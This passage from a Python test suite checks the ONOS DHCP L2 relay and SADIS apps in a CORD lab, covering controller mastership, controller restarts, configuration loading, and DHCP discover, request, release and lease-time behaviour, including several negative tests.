self.cliExit()
return master,standbys
except:
raise Exception('Failed to get cluster members')
return master,standbys
def get_cluster_current_master_standbys_of_connected_devices(self,controller=None):
''' returns master and standbys of all the connected devices to ONOS cluster instance'''
device_dict = {}
tries = 0
try:
cli = self.cliEnter(controller = controller)
while tries <= 10:
device_dict = {}
roles = json.loads(self.cli.roles(jsonFormat = True))
log_test.info("cluster 'roles' command output is %s"%roles)
if roles:
for device in roles:
device_dict[str(device['id'])]= {'master':str(device['master']),'standbys':device['standbys']}
for i in range(len(device_dict[device['id']]['standbys'])):
device_dict[device['id']]['standbys'][i] = str(device_dict[device['id']]['standbys'][i])
log_test.info('master and standbys for device %s are %s and %s'%(device['id'],device_dict[device['id']]['master'],device_dict[device['id']]['standbys']))
self.cliExit()
return device_dict
else:
tries += 1
time.sleep(1)
self.cliExit()
return device_dict
except:
raise Exception('Failed to get cluster members')
return device_dict
def get_number_of_devices_of_master(self,controller=None):
'''returns master-device pairs, which master having what devices'''
master_count = {}
try:
cli = self.cliEnter(controller = controller)
masters = json.loads(self.cli.masters(jsonFormat = True))
if masters:
for master in masters:
master_count[str(master['id'])] = {'size':int(master['size']),'devices':master['devices']}
return master_count
else:
return master_count
except:
raise Exception('Failed to get cluster members')
return master_count
def change_master_current_cluster(self,new_master=None,device_id=relay_device_id,controller=None):
if new_master is None: return False
self.cliEnter(controller=controller)
cmd = 'device-role' + ' ' + device_id + ' ' + new_master + ' ' + 'master'
command = self.cli.command(cmd = cmd, jsonFormat = False)
self.cliExit()
time.sleep(60)
master, standbys = self.get_cluster_current_master_standbys(controller=controller,device_id=device_id)
assert_equal(master,new_master)
log_test.info('Cluster master changed to %s successfully'%new_master)
def withdraw_cluster_current_mastership(self,master_ip=None,device_id=relay_device_id,controller=None):
'''current master looses its mastership and hence new master will be elected'''
self.cliEnter(controller=controller)
cmd = 'device-role' + ' ' + device_id + ' ' + master_ip + ' ' + 'none'
command = self.cli.command(cmd = cmd, jsonFormat = False)
self.cliExit()
time.sleep(60)
new_master_ip, standbys = self.get_cluster_current_master_standbys(controller=controller,device_id=device_id)
assert_not_equal(new_master_ip,master_ip)
log_test.info('Device-role of device %s successfully changed to none for controller %s'%(device_id,master_ip))
log_test.info('Cluster new master is %s'%new_master_ip)
return True
def cluster_controller_restarts(self, graceful = False):
controllers = get_controllers()
ctlr_len = len(controllers)
if ctlr_len <= 1:
log_test.info('ONOS is not running in cluster mode. This test only works for cluster mode')
assert_greater(ctlr_len, 1)
#this call would verify the cluster for once
onos_map = self.get_cluster_container_names_ips()
def check_exception(iteration, controller = None):
adjacent_controller = None
adjacent_controllers = None
if controller:
adjacent_controllers = list(set(controllers) - set([controller]))
adjacent_controller = adjacent_controllers[0]
for node in controllers:
onosLog = OnosLog(host = node)
##check the logs for storage exception
_, output = onosLog.get_log(('ERROR', 'Exception',))
if output and output.find('StorageException$Timeout') >= 0:
log_test.info('\nStorage Exception Timeout found on node: %s\n' %node)
log_test.info('Dumping the ERROR and Exception logs for node: %s\n' %node)
log_test.info('\n' + '-' * 50 + '\n')
log_test.info('%s' %output)
log_test.info('\n' + '-' * 50 + '\n')
failed = self.verify_leaders(controllers)
if failed:
log_test.info('Leaders command failed on nodes: %s' %failed)
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
return controller
try:
ips = self.get_cluster_current_member_ips(controller = adjacent_controller)
log_test.info('ONOS cluster formed with controllers: %s' %ips)
st = True
except:
st = False
failed = self.verify_leaders(controllers)
if failed:
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
if st is False:
log_test.info('No storage exception and ONOS cluster was not formed successfully')
else:
controller = None
return controller
next_controller = None
tries = self.ITERATIONS
for num in range(tries):
index = num % ctlr_len
#index = random.randrange(0, ctlr_len)
controller_name = onos_map[controllers[index]] if next_controller is None else onos_map[next_controller]
controller = onos_map[controller_name]
log_test.info('ITERATION: %d. Restarting Controller %s' %(num + 1, controller_name))
try:
#enable debug log for the other controllers before restarting this controller
adjacent_controllers = list( set(controllers) - set([controller]) )
self.log_set(controllers = adjacent_controllers)
self.log_set(app = 'io.atomix', controllers = adjacent_controllers)
if graceful is True:
log_test.info('Gracefully shutting down controller: %s' %controller)
self.onos_shutdown(controller)
cord_test_onos_restart(node = controller, timeout = 0)
self.log_set(controllers = controller)
self.log_set(app = 'io.atomix', controllers = controller)
time.sleep(60)
except:
time.sleep(5)
continue
#first archive the test case logs for this run
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'iteration_{}'.format(num+1),
archive_partition = self.ARCHIVE_PARTITION)
next_controller = check_exception(num, controller = controller)
def onos_shutdown(self, controller = None):
status = True
self.cliEnter(controller = controller)
try:
self.cli.shutdown(timeout = 10)
except:
log_test.info('Graceful shutdown of ONOS failed for controller: %s' %controller)
status = False
self.cliExit()
return status
def test_dhcpl2relay_initialize(self):
'''Configure the DHCP L2 relay app and start dhcpd'''
self.dhcpd_start()
def test_dhcpl2relay_with_one_request(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
self.send_recv(mac=mac)
def test_dhcpl2relay_app_install(self, iface = 'veth0'):
mac = self.get_mac(iface)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.dhcpl2relay'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
app_status = True
if app_status is not True:
log_test.info('%s app is not being installed'%app_name)
assert_equal(True, app_status)
def test_dhcpl2relay_sadis_app_install(self, iface = 'veth0'):
mac = self.get_mac(iface)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
app_status = True
if app_status is not True:
log_test.info('%s app is not being installed'%app_name)
assert_equal(True, app_status)
def test_dhcpl2relay_netcfg(self, iface = 'veth0'):
mac = self.get_mac(iface)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.dhcpl2relay'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
                    log_test.info('The network configuration is not shown: %s'%onos_netcfg['apps'][app_name])
else:
log_test.info('The network configuration is shown = %s'%onos_netcfg['apps'][app_name])
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown'%app_name)
assert_equal(True, False)
def test_dhcpl2relay_sadis_netcfg(self, iface = 'veth0'):
mac = self.get_mac(iface)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
                    log_test.info('The network configuration is not shown: %s'%onos_netcfg['apps'][app_name])
else:
log_test.info('The network configuration is shown = %s'%(onos_netcfg['apps'][app_name]))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown'%app_name)
assert_equal(True, False)
def test_dhcpl2relay_with_array_of_connect_points_for_dhcp_server(self, iface = 'veth0'):
connect_point = self.default_onos_netcfg['apps']['org.opencord.dhcpl2relay']['dhcpl2relay']['dhcpServerConnectPoints']
log_test.info('Existing connect point of dhcp server is %s'%connect_point)
relay_device_map1 = '{}/{}'.format(self.relay_device_id, random.randrange(1,5, 1))
relay_device_map2 = '{}/{}'.format(self.relay_device_id, random.randrange(6,10, 1))
relay_device_map3 = '{}/{}'.format(self.relay_device_id, random.randrange(10,16, 1))
relay_device_map4 = '{}/{}'.format(self.relay_device_id, random.randrange(17,23, 1))
dhcp_server_array_connectPoints = [connect_point[0],relay_device_map1,relay_device_map2,relay_device_map3,relay_device_map4]
log_test.info('Added array of connect points of dhcp server is %s'%dhcp_server_array_connectPoints)
mac = self.get_mac(iface)
self.onos_load_config(self.default_onos_netcfg)
dhcp_dict = { "apps" : { "org.opencord.dhcpl2relay" : {"dhcpl2relay" :
{"dhcpServerConnectPoints": dhcp_server_array_connectPoints}
}
}
}
self.onos_load_config(dhcp_dict)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.dhcpl2relay'
for app in onos_netcfg['apps']:
if app == app_name and onos_netcfg['apps'][app] != {}:
log_test.info('%s app is being installed'%app)
log_test.info('The network configuration is shown %s'%onos_netcfg['apps'][app])
x = set(onos_netcfg['apps'][app_name]['dhcpl2relay']['dhcpServerConnectPoints']) & set(dhcp_server_array_connectPoints)
if len(x) == len(dhcp_server_array_connectPoints):
log_test.info('The loaded onos network configuration is = %s'%dhcp_server_array_connectPoints)
app_status = True
break
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown'%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
self.send_recv(mac=mac)
def test_dhcpl2relay_with_subscriber_configured_with_ctag_stag_as_per_sadis(self, iface = 'veth0'):
mac = self.get_mac(iface)
c_tag = 600
invalid_sadis_info = self.sadis_info_dict(c_tag = 600,s_tag = 500)
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown for %s app'%app_name)
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['cTag'] == c_tag:
log_test.info('The S Tag and C Tag info from network configuration are %s and %s respectively '%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['sTag'],onos_netcfg['apps'][app_name]['sadis']['entries'][0]['cTag']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_app_activation_and_deactivation_multiple_times(self, iface = 'veth0'):
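# Toggle the dhcpl2relay app off and on 15 times, then verify a client can still complete
# a DHCP discover/request exchange.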
iterations = 15
for i in range(iterations):
self.onos_ctrl.deactivate()
time.sleep(3)
self.onos_ctrl.activate()
log_test.info('Dhcpl2relay app was deactivated and activated %s times, now sending DHCP discover'%iterations)
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
self.send_recv(mac=mac)
def test_dhcpl2relay_without_sadis_app(self, iface = 'veth0'):
mac = self.get_mac(iface)
OnosCtrl.uninstall_app(self.sadis_app_file)
OnosCtrl(self.sadis_app).deactivate()
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_delete_and_add_sadis_app(self, iface = 'veth0'):
mac = self.get_mac(iface)
log_test.info('Uninstall the sadis app from onos ,app version = %s '%self.sadis_app_file)
OnosCtrl.uninstall_app(self.sadis_app_file)
OnosCtrl(self.sadis_app).deactivate()
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
log_test.info('Installing the sadis app in onos again, app version = %s '%self.sadis_app_file)
OnosCtrl.install_app(self.sadis_app_file)
OnosCtrl(self.sadis_app).activate()
OnosCtrl(self.app).activate()
#self.onos_load_config(self.sadis_configs['relay_config'])
self.send_recv(mac=mac)
def test_dhcpl2relay_with_option_82(self, iface = 'veth0'):
pass
def test_dhcpl2relay_without_option_82(self, iface = 'veth0'):
pass
def test_dhcl2relay_for_option82_without_configuring_dhcpserver_to_accept_option82(self, iface = 'veth0'):
pass
def test_dhcpl2relay_with_different_uni_port_entry_sadis_config(self, iface = 'veth0'):
mac = self.get_mac(iface)
subscriber_port_id = "uni-200"
invalid_sadis_info = self.sadis_info_dict(subscriber_port_id = "uni-200")
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown for %s app'%app_name)
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['id'] == subscriber_port_id:
log_test.info('The network configuration is shown = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['id']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_with_different_ctag_options(self, iface = 'veth0'):
mac = self.get_mac(iface)
c_tag = 600
invalid_sadis_info = self.sadis_info_dict(c_tag = 600)
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown for %s app'%app_name)
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['cTag'] == c_tag:
log_test.info('The C Tag info from network configuration is = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['cTag']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_with_different_stag_options(self, iface = 'veth0'):
mac = self.get_mac(iface)
s_tag = 600
invalid_sadis_info = self.sadis_info_dict(s_tag = 600)
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown for %s app'%app_name)
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['sTag'] == s_tag:
log_test.info('The S Tag info from the network configuration is = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['sTag']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_without_nasportid_option_in_sadis(self, iface = 'veth0'):
mac = self.get_mac(iface)
invalid_sadis_info = self.sadis_info_dict(nas_port_id = " ")
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown for %s app'%app_name)
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['nasPortId'] == " ":
log_test.info('The nasPortId info from network configuration is shown = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['nasPortId']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_with_nasportid_different_from_id(self, iface = 'veth0'):
mac = self.get_mac(iface)
nas_port_id = "uni-509"
invalid_sadis_info = self.sadis_info_dict(nas_port_id = "uni-509")
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown for %s app'%app_name)
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['nasPortId'] == nas_port_id:
log_test.info('The nasPortId info from network configuration is shown = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['nasPortId']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_without_serial_id_of_olt(self, iface = 'veth0'):
mac = self.get_mac(iface)
invalid_sadis_info = self.sadis_info_dict(olt_serial_id = " ")
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown for %s app'%app_name)
elif onos_netcfg['apps'][app_name]['sadis']['entries'][1]['id'] == " ":
log_test.info('The serial Id info from network configuration is shown = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][1]['id']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_with_wrong_serial_id_of_olt(self, iface = 'veth0'):
mac = self.get_mac(iface)
olt_serial_id = "07f20d06696041febf974ccdhdhhjh37"
invalid_sadis_info = self.sadis_info_dict(olt_serial_id = "07f20d06696041febf974ccdhdhhjh37")
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown for %s app'%app_name)
elif onos_netcfg['apps'][app_name]['sadis']['entries'][1]['id'] == olt_serial_id:
log_test.info('The serial Id info from network configuration is shown = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][1]['id']))
app_status = True
if app_status is not True:
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_for_one_request_with_invalid_source_mac_broadcast(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac='ff:ff:ff:ff:ff:ff')
assert_equal(cip,None)
log_test.info('Dhcp server rejected client discover with invalid source mac, as expected')
def test_dhcpl2relay_for_one_request_with_invalid_source_mac_multicast(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac='01:80:c2:01:98:05')
assert_equal(cip,None)
log_test.info('Dhcp server rejected client discover with invalid source mac, as expected')
def test_dhcpl2relay_for_one_request_with_invalid_source_mac_zero(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac='00:00:00:00:00:00')
assert_equal(cip,None)
log_test.info('dhcp server rejected client discover with invalid source mac, as expected')
### We can't test this on single uni port setup, hence its not to test
@nottest
def test_dhcpl2relay_with_N_requests(self, iface = 'veth0',requests=10):
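# Send several discover/request cycles and assert that the server never hands out the
# same client IP twice within a run.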
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
ip_map = {}
for i in range(requests):
#mac = RandMAC()._fix()
#log_test.info('mac is %s'%mac)
cip, sip = self.send_recv(mac=mac, update_seed = True)
if ip_map.has_key(cip):
log_test.info('IP %s given out multiple times' %cip)
assert_equal(False, ip_map.has_key(cip))
ip_map[cip] = sip
time.sleep(1)
def test_dhcpl2relay_with_one_release(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.100.10', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
@nottest
def test_dhcpl2relay_with_Nreleases(self, iface = 'veth0'):
mac = None
self.dhcp = DHCPTest(seed_ip = '192.170.1.10', iface = iface)
ip_map = {}
for i in range(10):
cip, sip = self.send_recv(mac=mac, update_seed = True)
if ip_map.has_key(cip):
log_test.info('IP %s given out multiple times' %cip)
assert_equal(False, ip_map.has_key(cip))
ip_map[cip] = sip
for ip in ip_map.keys():
log_test.info('Releasing IP %s' %ip)
assert_equal(self.dhcp.release(ip), True)
ip_map2 = {}
log_test.info('Triggering DHCP discover again after release')
self.dhcp = DHCPTest(seed_ip = '192.170.1.10', iface = iface)
for i in range(len(ip_map.keys())):
cip, sip = self.send_recv(mac=mac, update_seed = True)
ip_map2[cip] = sip
log_test.info('Verifying released IPs were given back on rediscover')
if ip_map != ip_map2:
log_test.info('Map before release %s' %ip_map)
log_test.info('Map after release %s' %ip_map2)
assert_equal(ip_map, ip_map2)
@nottest
def test_dhcpl2relay_starvation(self, iface = 'veth0'):
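# Keep requesting leases until the server stops offering addresses; the pool is expected
# to hold 91 leases, after which a further discover/request must return no IP.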
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '182.17.0.1', iface = iface)
log_test.info('Verifying that the DHCP address pool can be exhausted')
count = 0
while True:
#mac = RandMAC()._fix()
cip, sip = self.send_recv(mac=mac,update_seed = True,validate = False)
if cip is None:
break
else:
count += 1
assert_equal(count,91)
log_test.info('Verifying that no address is offered once the pool is exhausted')
cip, sip = self.send_recv(mac=mac, update_seed = True, validate = False)
assert_equal(cip, None)
assert_equal(sip, None)
def test_dhcpl2relay_with_same_client_and_multiple_discovers(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s . Not going to send DHCPREQUEST.' %
(cip, sip, mac) )
assert_not_equal(cip, None)
log_test.info('Triggering DHCP discover again.')
new_cip, new_sip, new_mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(new_cip, cip)
log_test.info('Got the same IP for the same client when discover was sent again, as expected')
def test_dhcpl2relay_with_same_client_and_multiple_requests(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
log_test.info('Sending DHCP discover and DHCP request.')
cip, sip = self.send_recv(mac=mac)
mac = self.dhcp.get_mac(cip)[0]
log_test.info("Sending DHCP request again.")
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info('Got the same IP for the same client when request was sent again, as expected')
def test_dhcpl2relay_with_clients_desired_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '192.168.1.31', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac,desired = True)
assert_equal(cip,self.dhcp.seed_ip)
log_test.info('Got dhcp client desired IP %s from server %s for mac %s as expected' %
(cip, sip, mac) )
def test_dhcpl2relay_with_clients_desired_address_out_of_pool(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.35', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac,desired = True)
assert_not_equal(cip,None)
assert_not_equal(cip,self.dhcp.seed_ip)
log_test.info('Server offered an IP from its pool when an out-of-pool IP was requested, as expected')
def test_dhcpl2relay_nak_packet(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip, None)
new_cip, new_sip = self.dhcp.only_request('20.20.20.31', mac)
assert_equal(new_cip, None)
log_test.info('Server sent a NAK when the client requested an IP other than the one offered')
def test_dhcpl2relay_client_requests_with_specific_lease_time_in_discover_message(self, iface = 'veth0',lease_time=700):
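# Ask for a specific lease time (700s by default) in the DHCP discover and verify the
# server offers exactly that lease value.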
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.70', iface = iface)
self.dhcp.return_option = 'lease'
cip, sip, mac, lval = self.dhcp.only_discover(mac=mac,lease_time=True,lease_value=lease_time)
assert_equal(lval, lease_time)
log_test.info('dhcp server offered IP address with client requested lease time')
def test_dhcpl2relay_with_client_request_after_reboot(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip, None)
new_cip, new_sip = self.dhcp.only_request(cip, mac)
log_test.info('client rebooting...')
os.system('ifconfig '+iface+' down')
time.sleep(5)
os.system('ifconfig '+iface+' up')
new_cip2, new_sip = self.dhcp.only_request(cip, mac, cl_reboot = True)
assert_equal(new_cip2, cip)
log_test.info('client got same IP after reboot, as expected')
def test_dhcpl2relay_after_server_shutting_down(self, iface = 'veth0'):
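# Get a lease, stop the DHCP server through the remote controller and verify the client
# can no longer get an ACK; the server is restarted in the finally block.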
self.get_dhcpd_process()
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip, None)
new_cip, new_sip = self.dhcp.only_request(cip, mac)
log_test.info('server rebooting...')
try:
if self.dhcpd_stop(remote_controller = True, dhcpd = 'stop'):
time.sleep(5)
log_test.info('DHCP server is stopped ')
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip,None)
else:
log_test.info('DHCP server is not stopped' )
assert_equal(new_cip,None)
finally:
self.dhcpd_stop(remote_controller = True, dhcpd = 'restart')
def test_dhcpl2relay_after_server_reboot(self, iface = 'veth0'):
self.get_dhcpd_process()
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip, None)
new_cip, new_sip = self.dhcp.only_request(cip, mac)
log_test.info('server rebooting...')
try:
if self.dhcpd_stop(remote_controller = True, dhcpd = 'restart'):
time.sleep(5)
log_test.info('DHCP server is rebooted')
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip,cip)
else:
log_test.info('DHCP server is not stopped' )
assert_equal(new_cip,None)
finally:
self.dhcpd_stop(remote_controller = True, dhcpd = 'restart')
def test_dhcpl2relay_after_server_stop_start(self, iface = 'veth0'):
self.get_dhcpd_process()
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip, None)
new_cip, new_sip = self.dhcp.only_request(cip, mac)
log_test.info('server rebooting...')
try:
if self.dhcpd_stop(remote_controller = True, dhcpd = 'stop'):
time.sleep(5)
log_test.info('DHCP server is stopped ')
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip,None)
else:
log_test.info('DHCP server is not stopped')
assert_equal(new_cip,None)
self.dhcpd_stop(remote_controller = True, dhcpd = 'start')
log_test.info('DHCP server is started ')
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info('client got same IP after server rebooted, as expected')
finally:
self.dhcpd_stop(remote_controller = True, dhcpd = 'restart')
def test_dhcpl2relay_with_specific_lease_time_in_discover_and_without_in_request_packet(self, iface = 'veth0',lease_time=700):
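# Request a 700s lease in the discover only; the ACK for a plain request is then expected
# to carry a different (server default) lease time.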
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
self.dhcp.return_option = 'lease'
log_test.info('Sending DHCP discover with lease time of 700')
cip, sip, mac, lval = self.dhcp.only_discover(mac=mac,lease_time = True, lease_value=lease_time)
assert_equal(lval,lease_time)
new_cip, new_sip, lval = self.dhcp.only_request(cip, mac, lease_time = True)
assert_equal(new_cip,cip)
assert_not_equal(lval, lease_time) #Negative Test Case
log_test.info('Client-requested lease time in the discover packet is not seen in the server ACK packet, as expected')
def test_dhcpl2relay_with_specific_lease_time_in_request_and_without_in_discover_packet(self, iface = 'veth0',lease_time=800):
mac = self.get_mac(iface)
